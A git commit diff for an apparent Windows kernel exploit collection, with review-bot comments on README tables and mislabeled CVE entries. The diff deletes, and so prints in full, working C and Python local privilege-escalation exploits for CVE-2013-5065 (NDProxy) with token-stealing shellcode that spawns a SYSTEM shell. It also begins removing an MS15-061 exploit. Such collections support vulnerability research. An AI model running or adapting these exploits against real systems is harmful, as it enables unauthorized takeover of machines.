fix some bugs🔮

ascotbe
2022-01-20 10:03:37 +08:00
parent 9b5882a3ea
commit 33ccded285
71 changed files with 745 additions and 1867 deletions

View File

@@ -38,6 +38,7 @@ http://kernelhub.ascotbe.com
| [CVE-2021-36934](./CVE-2021-36934) | Windows Elevation | Windows 10 |
| [CVE-2021-34527](./TestFailure/CVE-2021-34527) | Windows Print Spooler Remote Code Execution | Windows 7/8/10/2008/2012/2016/2019/2022/Server |
| [CVE-2021-33739](./CVE-2021-33739) | Microsoft DWM Core Library Elevation | Windows 10/Server |
| [CVE-2021-31166](./TestFailure/CVE-2021-31166) | HTTP Protocol Stack | Windows 10/Server |
| [CVE-2021-26868](./CVE-2021-33739) | Windows Graphics Component Elevation | Windows 8.1/10/2012/2016/2019/Server |
| [CVE-2021-21551](./TestFailure/CVE-2021-21551) | None | None |
| [CVE-2021-1732](./CVE-2021-1732) | Windows Win32k | Windows 10/2019/Server |
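Review bot: the CVE-2021-26868 row links to ./CVE-2021-33739, which is the directory of the row directly above it; it should point at its own directory (./CVE-2021-26868, or ./TestFailure/CVE-2021-26868 if that entry also failed reproduction). The CVE-2021-21551 row is still `None | None` for description and affected versions even though it is being tracked under TestFailure; fill in at least the description so the table stays self-describing.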
@@ -79,7 +80,6 @@ http://kernelhub.ascotbe.com
| [CVE-2018-8440](./TestFailure/CVE-2018-8440) | Windows ALPC Elevation | Windows 7/8/10/2008/2012/2016 |
| [CVE-2018-8120](./CVE-2018-8120) | Win32k Elevation | Windows 7/2008 |
| [CVE-2018-1038](./TestFailure/CVE-2018-1038) | Windows Kernel Elevation | Windows 7/2008 |
| [CVE-2018-0743](./TestFailure/CVE-2018-0743) | Windows Subsystem for Linux Elevation | Windows 10/2016 |
| [CVE-2018-0833](./CVE-2018-0833) | SMBv3 Null Pointer Dereference Denial of Service | Windows 8/2012 |
| [CVE-2018-0886](./TestFailure/CVE-2018-0886) | CredSSP Remote Code Execution | Windows 7/8/10/2008/2012/2016/2019/Server |
| [CVE-2018-0824](./TestFailure/CVE-2018-0824) | COM for Windows Remote Code Execution | Windows 7/8/10/2008/2012/2016/Server |
@@ -214,11 +214,11 @@ http://kernelhub.ascotbe.com
| CVE-2011-0045| CVE-2011-1237| CVE-2013-0008| CVE-2013-1300| CVE-2013-5065|
| CVE-2014-6321| CVE-2014-6324| CVE-2015-0002| CVE-2015-0062| CVE-2015-1725|
| CVE-2016-3309| CVE-2017-0005| CVE-2017-0100| CVE-2017-0263| CVE-2017-11783|
| CVE-2017-8465| CVE-2018-0743| CVE-2018-0824| CVE-2018-0886| CVE-2018-1038|
| CVE-2018-8440| CVE-2019-0708| CVE-2019-0859| CVE-2019-0863| CVE-2019-0986|
| CVE-2019-1040| CVE-2019-1215| CVE-2019-1253| CVE-2019-1322| CVE-2019-1422|
| CVE-2020-0624| CVE-2020-0814| CVE-2020-1350| CVE-2020-1362| CVE-2020-17057|
| CVE-2020-17087| CVE-2021-1709| CVE-2021-21551| CVE-2021-34527| CVE-2021-43224|
| CVE-2017-8465| CVE-2018-0824| CVE-2018-0886| CVE-2018-1038| CVE-2018-8440|
| CVE-2019-0708| CVE-2019-0859| CVE-2019-0863| CVE-2019-0986| CVE-2019-1040|
| CVE-2019-1215| CVE-2019-1253| CVE-2019-1322| CVE-2019-1422| CVE-2020-0624|
| CVE-2020-0814| CVE-2020-1350| CVE-2020-1362| CVE-2020-17057| CVE-2020-17087|
| CVE-2021-1709| CVE-2021-21551| CVE-2021-31166| CVE-2021-34527| CVE-2021-43224|
| CVE-2021-43883 |
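Review bot: the rewritten failed-reproduction list drops CVE-2018-0743 and adds CVE-2021-31166, but the table earlier in this file still links CVE-2018-0743 to ./TestFailure/CVE-2018-0743; either keep it in this list or relink the row to ./CVE-2018-0743 so the two agree. The trailing row `| CVE-2021-43883 |` has a single cell in a five-column table; pad it with four empty cells so it renders as a regular row.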

View File

@@ -33,6 +33,7 @@
| [CVE-2021-36934](./CVE-2021-36934) | Windows Elevation | Windows 10 |
| [CVE-2021-34527](./TestFailure/CVE-2021-34527) | Windows Print Spooler Remote Code Execution | Windows 7/8/10/2008/2012/2016/2019/2022/Server |
| [CVE-2021-33739](./CVE-2021-33739) | Microsoft DWM Core Library Elevation | Windows 10/Server |
| [CVE-2021-31166](./TestFailure/CVE-2021-31166) | HTTP Protocol Stack | Windows 10/Server |
| [CVE-2021-26868](./CVE-2021-33739) | Windows Graphics Component Elevation | Windows 8.1/10/2012/2016/2019/Server |
| [CVE-2021-21551](./TestFailure/CVE-2021-21551) | None | None |
| [CVE-2021-1732](./CVE-2021-1732) | Windows Win32k | Windows 10/2019/Server |
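Review bot: same problem as in the Chinese README: the CVE-2021-26868 row links to ./CVE-2021-33739 instead of its own directory, and the CVE-2021-21551 row still carries `None | None` for description and versions.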
@@ -74,7 +75,6 @@
| [CVE-2018-8440](./TestFailure/CVE-2018-8440) | Windows ALPC Elevation | Windows 7/8/10/2008/2012/2016 |
| [CVE-2018-8120](./CVE-2018-8120) | Win32k Elevation | Windows 7/2008 |
| [CVE-2018-1038](./TestFailure/CVE-2018-1038) | Windows Kernel Elevation | Windows 7/2008 |
| [CVE-2018-0743](./TestFailure/CVE-2018-0743) | Windows Subsystem for Linux Elevation | Windows 10/2016 |
| [CVE-2018-0833](./CVE-2018-0833) | SMBv3 Null Pointer Dereference Denial of Service | Windows 8/2012 |
| [CVE-2018-0886](./TestFailure/CVE-2018-0886) | CredSSP Remote Code Execution | Windows 7/8/10/2008/2012/2016/2019/Server |
| [CVE-2018-0824](./TestFailure/CVE-2018-0824) | COM for Windows Remote Code Execution | Windows 7/8/10/2008/2012/2016/Server |
@@ -210,11 +210,11 @@ The following numbers are all CVEs that failed to pass the recurrence test after
| CVE-2011-0045| CVE-2011-1237| CVE-2013-0008| CVE-2013-1300| CVE-2013-5065|
| CVE-2014-6321| CVE-2014-6324| CVE-2015-0002| CVE-2015-0062| CVE-2015-1725|
| CVE-2016-3309| CVE-2017-0005| CVE-2017-0100| CVE-2017-0263| CVE-2017-11783|
| CVE-2017-8465| CVE-2018-0743| CVE-2018-0824| CVE-2018-0886| CVE-2018-1038|
| CVE-2018-8440| CVE-2019-0708| CVE-2019-0859| CVE-2019-0863| CVE-2019-0986|
| CVE-2019-1040| CVE-2019-1215| CVE-2019-1253| CVE-2019-1322| CVE-2019-1422|
| CVE-2020-0624| CVE-2020-0814| CVE-2020-1350| CVE-2020-1362| CVE-2020-17057|
| CVE-2020-17087| CVE-2021-1709| CVE-2021-21551| CVE-2021-34527| CVE-2021-43224|
| CVE-2017-8465| CVE-2018-0824| CVE-2018-0886| CVE-2018-1038| CVE-2018-8440|
| CVE-2019-0708| CVE-2019-0859| CVE-2019-0863| CVE-2019-0986| CVE-2019-1040|
| CVE-2019-1215| CVE-2019-1253| CVE-2019-1322| CVE-2019-1422| CVE-2020-0624|
| CVE-2020-0814| CVE-2020-1350| CVE-2020-1362| CVE-2020-17057| CVE-2020-17087|
| CVE-2021-1709| CVE-2021-21551| CVE-2021-31166| CVE-2021-34527| CVE-2021-43224|
| CVE-2021-43883 |
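Review bot: the English list is changed consistently with the Chinese one (CVE-2018-0743 removed, CVE-2021-31166 added), so the same inconsistency applies: the CVE-2018-0743 row above still links to ./TestFailure/CVE-2018-0743. The single-cell `| CVE-2021-43883 |` row should also be padded to five cells here.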

View File

@@ -23,7 +23,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2005-1983
#### 项目来源
-
- None
#### 分析文章
- https://blog.csdn.net/tomqq/article/details/1951128

View File

@@ -23,7 +23,7 @@ The vulnerability does not test, the root directory is stored in the network col
#### ProjectSource
-
- None
#### Analyse

View File

@@ -27,7 +27,7 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2009-0079
#### 项目来源
-
- None
#### 分析文章

View File

@@ -23,7 +23,7 @@ The vulnerability does not test, the root directory is stored in the network col
#### ProjectSource
-
- None
#### Analyse

View File

@@ -27,4 +27,4 @@ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2010-2554
#### 项目来源
-
- None

View File

@@ -27,4 +27,4 @@ The vulnerability does not test, the root directory is stored in the network col
#### ProjectSource
-
- None

Binary file not shown.

View File

@@ -10,9 +10,19 @@
| ---------- | ---------------- | ------- | ------ | ------ |
| Windows Xp | | | SP3 | |
#### 修复补丁
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2011-0045
```
#### 利用方式
暂无
该漏洞并未进行测试,根目录留存着网络收集**[CVE编号].zip**的EXP或者POC代码状态未知
#### 项目来源
- None
#### 分析文章
- https://blog.csdn.net/QEver/article/details/6227415

View File

@@ -0,0 +1,34 @@
### CVE-2011-0045
#### Describe
The Trace Events functionality in the kernel in Microsoft Windows XP SP3 does not properly perform type conversion, which causes integer truncation and insufficient memory allocation and triggers a buffer overflow, which allows local users to gain privileges via a crafted application, related to WmiTraceMessageVa, aka "Windows Kernel Integer Truncation Vulnerability."
#### ImpactVersion
| Product | CPU Architecture | Version | Update | Tested |
| ---------- | ---------------- | ------- | ------ | ------ |
| Windows Xp | | | SP3 | |
#### Patch
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2011-0045
```
#### Utilization
The vulnerability does not test, the root directory is stored in the network collection **[CVE number] .zip** EXP or POC, code status unknown
#### ProjectSource
- None
#### Analyse
- https://blog.csdn.net/QEver/article/details/6227415
- https://www.geek-share.com/detail/2510409740.html
- https://bbs.pediy.com/thread-130487.htm
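Review bot: the Utilization sentence is not grammatical English and reads as a machine translation of the Chinese readme; suggest "This vulnerability has not been tested. An EXP/PoC collected from the internet is kept in the root directory as [CVE number].zip; whether it works is unknown." The same sentence is copied into every English readme added in this commit, so it is worth fixing once and propagating.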

Binary file not shown.

View File

@@ -18,6 +18,16 @@
| Windows Server 2012 | | | | |
| Windows Vista | | | SP2 | |
#### 修复补丁
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1215
```
#### 利用方式
暂无
该漏洞并未进行测试,根目录留存着网络收集**[CVE编号].zip**的EXP或者POC代码状态未知
#### 项目来源
- None
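Review bot: the 修复补丁 block links to the CVE-2019-1215 advisory, but this file's impact table (Server 2012, Vista SP2) matches the CVE-2013-0008 readme added in the next file, whose Patch block correctly points at .../advisory/CVE-2013-0008. The URL here looks like a copy-paste from another entry and should be changed to CVE-2013-0008.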

View File

@@ -0,0 +1,36 @@
### CVE-2013-0008
#### Describe
win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle window broadcast messages, which allows local users to gain privileges via a crafted application, aka "Win32k Improper Message Handling Vulnerability."
#### ImpactVersion
| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | ------ |
| Windows 7 | | | | |
| Windows 7 | | | SP1 | |
| Windows 8 | | | | |
| Windows Rt | | | | |
| Windows Server 2008 | | | SP2 | |
| Windows Server 2008 | | R2 | | |
| Windows Server 2008 | | R2 | SP1 | |
| Windows Server 2012 | | | | |
| Windows Vista | | | SP2 | |
#### Patch
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2013-0008
```
#### Utilization
The vulnerability does not test, the root directory is stored in the network collection **[CVE number] .zip** EXP or POC, code status unknown
#### ProjectSource
- None

View File

@@ -1,216 +0,0 @@
/*
################################################################
# Exploit Title: Windows NDProxy Privilege Escalation (MS14-002)
# Date: 2015-08-03
# Exploit Author: Tomislav Paskalev
# Vulnerable Software:
# Windows XP SP3 x86
# Windows XP SP2 x86-64
# Windows 2003 SP2 x86
# Windows 2003 SP2 x86-64
# Windows 2003 SP2 IA-64
# Supported vulnerable software:
# Windows XP SP3 x86
# Windows 2003 SP2 x86
# Tested on:
# Windows XP SP3 x86 EN
# Windows 2003 SP2 x86 EN
# CVE ID: 2013-5065
################################################################
# Vulnerability description:
# NDPROXY is a system-provided driver that interfaces WAN
# miniport drivers, call managers, and miniport call managers
# to the Telephony Application Programming Interfaces (TAPI)
# services.
# The vulnerability is caused when the NDProxy.sys kernel
# component fails to properly validate input.
# An attacker who successfully exploited this vulnerability
# could run arbitrary code in kernel mode (i.e. with SYSTEM
# privileges).
################################################################
# Exploit notes:
# Privileged shell execution:
# - the SYSTEM shell will spawn within the existing shell
# (i.e. exploit usable via a remote shell)
# Exploit compiling:
# - # i586-mingw32msvc-gcc MS14-002.c -o MS14-002.exe
# Exploit prerequisites:
# - low privilege access to the target (remote shell or RDP)
# - target not patched (KB2914368 not installed)
# - service "Routing and Remote Access" running on the target
# - "Power User" user group can start and stop services
# - > sc query remoteaccess
# - > sc start remoteaccess
################################################################
# Thanks to:
# Andy (C PoC - Win XP SP3)
# ryujin (Python PoC - Win XP SP3)
################################################################
# References:
# http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5065
# https://technet.microsoft.com/en-us/library/security/ms14-002.aspx
# https://penturalabs.wordpress.com/2013/12/11/ndproxy-privilege-escalation-cve-2013-5065/
# https://www.exploit-db.com/exploits/30014/
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms681674%28v=vs.85%29.aspx
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa363858%28v=vs.85%29.aspx
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381%28v=vs.85%29.aspx
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa363216%28v=vs.85%29.aspx
################################################################
*/
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
typedef struct {
PVOID Unknown1;
PVOID Unknown2;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT PathLength;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct {
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemModuleInformation = 11,
SystemHandleInformation = 16
} SYSTEM_INFORMATION_CLASS;
typedef DWORD NTSTATUS;
NTSTATUS (WINAPI *_NtQuerySystemInformation) (SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength);
static VOID InitFirstPage (void)
{
PVOID BaseAddress;
ULONG RegionSize;
NTSTATUS ReturnCode;
FARPROC NtAllocateVirtualMemory;
NtAllocateVirtualMemory = GetProcAddress (GetModuleHandle ("NTDLL.DLL"), "NtAllocateVirtualMemory");
fprintf (stderr, "[+] NtAllocateVirtualMemory@%p\n", NtAllocateVirtualMemory);
RegionSize = 0xf000;
BaseAddress = (PVOID) 0x00000001;
ReturnCode = NtAllocateVirtualMemory (GetCurrentProcess (),
&BaseAddress,
0,
&RegionSize,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE);
if (ReturnCode != 0)
{
fprintf (stderr, "[-] NtAllocateVirtualMemory() failed to map first page\n");
fprintf (stderr, " Error code: %#X\n", ReturnCode);
fflush (stderr);
ExitProcess (1);
}
fprintf (stderr, "[+] BaseAddress: %p, RegionSize: %#x\n", BaseAddress, RegionSize), fflush (stderr);
FillMemory (BaseAddress, RegionSize, 0x41);
return;
}
int exploit (unsigned char *shellcode)
{
DWORD writtenBytes;
int returnValue;
InitFirstPage ();
unsigned char *shellcodeBuffer;
shellcodeBuffer = (char *) malloc (400);
memset (shellcodeBuffer, (int) "xCC", 400);
memcpy (shellcodeBuffer, shellcode, 112);
returnValue = WriteProcessMemory ((HANDLE) 0xFFFFFFFF, (LPVOID) 0x00000001, shellcodeBuffer, 0x400, &writtenBytes);
if (returnValue == 0)
{
printf ("[-] Attempt to map memory_write failed\n");
printf (" Error code: %d\n", GetLastError ());
exit(1);
}
HANDLE ndProxyDeviceHandle = CreateFileA ("\\\\.\\NDProxy", 0, 0, NULL, OPEN_EXISTING, 0, NULL);
if (ndProxyDeviceHandle == INVALID_HANDLE_VALUE)
{
printf ("[-] Creating a device handle on NDProxy failed\n");
printf (" Error code: %d\n", GetLastError());
exit (0);
}
DWORD inputBuffer [0x15] = {0};
DWORD returnedBytes = 0;
*(inputBuffer + 5) = 0x7030125;
*(inputBuffer + 7) = 0x34;
DeviceIoControl (ndProxyDeviceHandle, 0x8fff23cc, inputBuffer, 0x54, inputBuffer, 0x24, &returnedBytes, 0);
CloseHandle (ndProxyDeviceHandle);
system ("cmd.exe /T:C0 /K cd c:\\windows\\system32");
return 0;
}
int main (int argc, char **argv)
{
if (argc != 2)
{
printf ("[*] Usage: %s OS_TYPE\n", argv[0]);
printf (" supported OS_TYPE:\n");
printf (" XP - Windows XP SP3 x86\n");
printf (" 2k3 - Windows 2003 SP2 x86\n");
printf ("[*] Note: the service \"Routing and Remote Access\"\n");
printf (" must be running on the target machine\n");
exit (0);
}
else
{
if ((strcmp (argv[1], "xp") == 0) || (strcmp (argv[1], "XP") == 0))
{
unsigned char shellcodeXP[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x3C\x00\x00\x00\x90\x90\x90\x90"
"\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x44\x8B\xC8\x8B"
"\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x83\xB8\x84\x00\x00\x00"
"\x04\x75\xEC\x8B\x90\xC8\x00\x00\x00\x89\x91\xC8\x00\x00\x00\xC3";
exploit (shellcodeXP);
}
else if ((strcmp (argv[1], "2k3") == 0) || (strcmp (argv[1], "2K3") == 0))
{
unsigned char shellcode2k3[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x3C\x00\x00\x00\x90\x90\x90\x90"
"\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x38\x8B\xC8\x8B"
"\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x83\xB8\x94\x00\x00\x00"
"\x04\x75\xEC\x8B\x90\xD8\x00\x00\x00\x89\x91\xD8\x00\x00\x00\xC3";
exploit (shellcode2k3);
}
else
{
printf ("[-] Invalid argument\n");
printf (" Argument used: %s\n", argv[1]);
exit(0);
}
}
}
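Review bot: this deletes the only readable copy of the MS14-002 source while the readmes now say the EXP/PoC lives in an opaque [CVE number].zip ("Binary file not shown" above). Archives cannot be diffed or reviewed, so either keep the .c file alongside the zip or record the upstream references from its header (the exploit-db, MSRC and penturalabs URLs) in the corresponding readme's Analyse list so the provenance is not lost. The commit message "fix some bugs" also does not mention that sources were moved into archives.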

View File

@@ -1,80 +0,0 @@
# NDPROXY Local SYSTEM privilege escalation
# http://www.offensive-security.com
# Tested on Windows XP SP3
# http://www.offensive-security.com/vulndev/ndproxy-local-system-exploit-cve-2013-5065/
# Original crash ... null pointer dereference
# Access violation - code c0000005 (!!! second chance !!!)
# 00000038 ?? ???
from ctypes import *
from ctypes.wintypes import *
import os, sys
kernel32 = windll.kernel32
ntdll = windll.ntdll
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
FILE_SHARE_READ = 0x00000001
FILE_SHARE_WRITE = 0x00000002
NULL = 0x0
OPEN_EXISTING = 0x3
PROCESS_VM_WRITE = 0x0020
PROCESS_VM_READ = 0x0010
MEM_COMMIT = 0x00001000
MEM_RESERVE = 0x00002000
MEM_FREE = 0x00010000
PAGE_EXECUTE_READWRITE = 0x00000040
PROCESS_ALL_ACCESS = 2097151
FORMAT_MESSAGE_FROM_SYSTEM = 0x00001000
baseadd = c_int(0x00000001)
MEMRES = (0x1000 | 0x2000)
MEM_DECOMMIT = 0x4000
PAGEEXE = 0x00000040
null_size = c_int(0x1000)
STATUS_SUCCESS = 0
def log(msg):
print msg
def getLastError():
"""[-] Format GetLastError"""
buf = create_string_buffer(2048)
if kernel32.FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL,
kernel32.GetLastError(), 0,
buf, sizeof(buf), NULL):
log(buf.value)
else:
log("[-] Unknown Error")
print "[*] Microsoft Windows NDProxy CVE-2013-5065 0day"
print "[*] Vulnerability found in the wild"
print "[*] Coded by Offensive Security"
tmp = ("\x00"*4)*5 + "\x25\x01\x03\x07" + "\x00"*4 + "\x34\x00\x00\x00" + "\x00"*(84-24)
InBuf = c_char_p(tmp)
dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, byref(baseadd), 0x0, byref(null_size), MEMRES, PAGEEXE)
if dwStatus != STATUS_SUCCESS:
print "[+] Something went wrong while allocating the null paged memory: %s" % dwStatus
getLastError()
written = c_ulong()
sh = "\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x44\x8B\xC8\x8B\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x83\xB8\x84\x00\x00\x00\x04\x75\xEC\x8B\x90\xC8\x00\x00\x00\x89\x91\xC8\x00\x00\x00\xC3"
sc = "\x90"*0x38 + "\x3c\x00\x00\x00" + "\x90"*4 + sh + "\xcc"*(0x400-0x3c-4-len(sh))
alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, 0x00000001, sc, 0x400, byref(written))
if alloc == 0:
print "[+] Something went wrong while writing our junk to the null paged memory: %s" % alloc
getLastError()
dwRetBytes = DWORD(0)
DEVICE_NAME = "\\\\.\\NDProxy"
hdev = kernel32.CreateFileA(DEVICE_NAME, 0, 0, None, OPEN_EXISTING , 0, None)
if hdev == -1:
print "[-] Couldn't open the device... :("
sys.exit()
kernel32.DeviceIoControl(hdev, 0x8fff23cc, InBuf, 0x54, InBuf, 0x24, byref(dwRetBytes), 0)
kernel32.CloseHandle(hdev)
print "[+] Spawning SYSTEM Shell..."
os.system("start /d \"C:\\windows\\system32\" cmd.exe")
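Review bot: as with the C file above, the deletion drops the offensive-security.com write-up URL and the "Tested on Windows XP SP3" note from the header, neither of which appears in the new readme (its Analyse list only has the pediy thread); carry that reference over so the readme still documents where the PoC came from and what it was tested on.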

Binary file not shown.

View File

@@ -12,9 +12,19 @@
| Windows Xp | | | SP2 | |
| Windows Xp | | | SP3 | |
#### 修复补丁
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2013-5065
```
#### 利用方式
暂无
该漏洞并未进行测试,根目录留存着网络收集**[CVE编号].zip**的EXP或者POC代码状态未知
#### 项目来源
- None
#### 分析文章
- https://bbs.pediy.com/thread-182135.htm

View File

@@ -0,0 +1,34 @@
### CVE-2019-1215
#### Describe
NDProxy.sys in the kernel in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a crafted application, as exploited in the wild in November 2013.
#### ImpactVersion
| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | ------ |
| Windows Server 2003 | | | SP2 | |
| Windows Xp | | | SP2 | |
| Windows Xp | | | SP3 | |
#### Patch
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1215
```
#### Utilization
The vulnerability does not test, the root directory is stored in the network collection **[CVE number] .zip** EXP or POC, code status unknown
#### ProjectSource
- None
#### Analyse
- https://bbs.pediy.com/thread-182135.htm
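Review bot: the heading (### CVE-2019-1215) and the Patch URL do not match the content: the description (NDProxy.sys, XP SP2/SP3 and Server 2003 SP2, exploited in the wild in November 2013), the impact table and the pediy link are the CVE-2013-5065 entry, and the Chinese readme in the previous file links .../advisory/CVE-2013-5065. Rename the heading and fix the Patch URL to CVE-2013-5065.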

Binary file not shown.

View File

@@ -20,9 +20,19 @@ Schannel允许远程攻击者通过精心设计的数据包远程执行代码
| Windows Server 2012 | | R2 | | |
| Windows Vista | | | SP2 | |
#### 修复补丁
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-6321
```
#### 利用方式
暂无
该漏洞并未进行测试,根目录留存着网络收集**[CVE编号].zip**的EXP或者POC代码状态未知
#### 项目来源
- None
#### 分析文章
- http://bobao.360.cn/learning/detail/114.html

View File

@@ -0,0 +1,44 @@
### CVE-2014-6321
#### Describe
Schannel in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to execute arbitrary code via crafted packets, aka "Microsoft Schannel Remote Code Execution Vulnerability."
#### ImpactVersion
| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | ------ |
| Windows 7 | | | SP1 | |
| Windows 8 | | | | |
| Windows 8.1 | | | | |
| Windows Rt | | | | |
| Windows Rt 8.1 | | | | |
| Windows Server 2003 | | | SP2 | |
| Windows Server 2008 | | | SP2 | |
| Windows Server 2008 | | R2 | SP1 | |
| Windows Server 2012 | | | | |
| Windows Server 2012 | | R2 | | |
| Windows Vista | | | SP2 | |
#### Patch
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-6321
```
#### Utilization
The vulnerability does not test, the root directory is stored in the network collection **[CVE number] .zip** EXP or POC, code status unknown
#### ProjectSource
- None
#### Analyse
- http://bobao.360.cn/learning/detail/114.html
- https://wooyun.js.org/drops/CVE-2014-6321%20schannel%E5%A0%86%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.html
- https://www.freebuf.com/vuls/52110.html

Binary file not shown.

View File

@@ -18,9 +18,19 @@
| Windows Server 2012 | | R2 | | |
| Windows Vista | | | SP2 | |
#### 修复补丁
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-6324
```
#### 利用方式
暂无
该漏洞并未进行测试,根目录留存着网络收集**[CVE编号].zip**的EXP或者POC代码状态未知
#### 项目来源
- None
#### 分析文章
- https://naykcin.top/2020/01/12/ms14068/

View File

@@ -0,0 +1,41 @@
### CVE-2014-6324
#### Describe
The Kerberos Key Distribution Center (KDC) in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote authenticated domain users to obtain domain administrator privileges via a forged signature in a ticket, as exploited in the wild in November 2014, aka "Kerberos Checksum Vulnerability."
#### ImpactVersion
| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | ------ |
| Windows 7 | | | | |
| Windows 8 | | | | |
| Windows 8.1 | | | | |
| Windows Server 2003 | | | SP2 | |
| Windows Server 2008 | | | SP2 | |
| Windows Server 2008 | | R2 | SP1 | |
| Windows Server 2012 | | | | |
| Windows Server 2012 | | R2 | | |
| Windows Vista | | | SP2 | |
#### Patch
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2014-6324
```
#### Utilization
The vulnerability does not test, the root directory is stored in the network collection **[CVE number] .zip** EXP or POC, code status unknown
#### ProjectSource
- None
#### Analyse
- https://naykcin.top/2020/01/12/ms14068/
- https://www.cnblogs.com/feizianquan/p/11760564.html

View File

@@ -17,9 +17,19 @@
| Windows Server 2012 | | | | |
| Windows Server 2012 | | R2 | | |
#### 修复补丁
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-0002
```
#### 利用方式
有源码,未知利用
该漏洞并未进行测试,根目录留存着网络收集**[CVE编号].zip**的EXP或者POC代码状态未知
#### 项目来源
- None
#### 分析文章
- https://googleprojectzero.blogspot.com/2015/02/a-tokens-tale_9.html

View File

@@ -0,0 +1,38 @@
### CVE-2015-0002
#### Describe
The AhcVerifyAdminContext function in ahcache.sys in the Application Compatibility component in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not verify that an impersonation token is associated with an administrative account, which allows local users to gain privileges by running AppCompatCache.exe with a crafted DLL file, aka MSRC ID 20544 or "Microsoft Application Compatibility Infrastructure Elevation of Privilege Vulnerability."
#### ImpactVersion
| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | ------ |
| Windows 7 | | | SP1 | |
| Windows 8 | | | | |
| Windows 8.1 | | | | |
| Windows Rt | | | | |
| Windows Rt 8.1 | | | | |
| Windows Server 2008 | | R2 | SP1 | |
| Windows Server 2012 | | | | |
| Windows Server 2012 | | R2 | | |
#### Patch
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2015-0002
```
#### Utilization
The vulnerability does not test, the root directory is stored in the network collection **[CVE number] .zip** EXP or POC, code status unknown
#### ProjectSource
- None
#### Analyse
- https://googleprojectzero.blogspot.com/2015/02/a-tokens-tale_9.html
- http://www.vuln.cn/6702
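Review bot: the Utilization text here uses the generic "not tested, status unknown" sentence, while the Chinese readme in the previous file says 有源码,未知利用 (source available, exploitation unknown); the two language versions should state the same thing about what is actually in the zip.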

View File

@@ -29,5 +29,5 @@ The vulnerability does not test, the root directory is stored in the network col
#### ProjectSource
-
- None

View File

@@ -1,455 +0,0 @@
#include <windows.h>
#include<stdio.h>
/*
Exploiting MS15-061 with reverse engineering Win32k.sys by
steps :
1: hook PEB callback Function
